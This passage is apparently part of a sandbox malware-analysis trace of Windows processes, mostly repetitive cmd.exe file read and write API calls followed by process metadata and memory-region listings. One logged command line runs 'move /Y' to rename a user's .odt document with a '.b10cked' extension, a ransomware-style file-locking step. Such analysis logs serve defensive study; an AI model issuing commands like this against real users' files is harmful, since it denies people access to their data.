[0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.908] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.910] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.910] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.911] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.911] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] GetFileType (hFile=0x4c) returned 0x1 [0140.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.911] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] GetFileType (hFile=0x4c) returned 0x1 [0140.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.912] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.913] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] GetFileType (hFile=0x4c) returned 0x1 [0140.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.913] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.914] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] GetFileType (hFile=0x4c) returned 0x1 [0140.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.914] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x32, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] GetFileType (hFile=0x4c) returned 0x1 [0140.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.915] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x32, lpOverlapped=0x0) returned 1 [0140.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.915] _close (_FileHandle=4) returned 0 [0140.915] FindNextFileW (in: hFindFile=0x3f0eb8, lpFindFileData=0x28f21c | out: lpFindFileData=0x28f21c) returned 0 [0140.916] GetLastError () returned 0x12 [0140.916] FindClose (in: hFindFile=0x3f0eb8 | out: hFindFile=0x3f0eb8) returned 1 [0140.916] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.916] _close (_FileHandle=3) returned 0 [0140.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.917] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.917] SetConsoleInputExeNameW () returned 0x1 [0140.917] GetConsoleOutputCP () returned 0x1b5 [0140.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.918] exit (_Code=0) Process: id = "167" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b60" os_pid = "0xf1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14832 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14833 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14834 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14835 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 14836 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14837 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14838 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14839 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14840 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 14841 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15642 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15643 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15644 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15645 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 15646 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 15647 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15648 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15649 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15650 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15651 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point 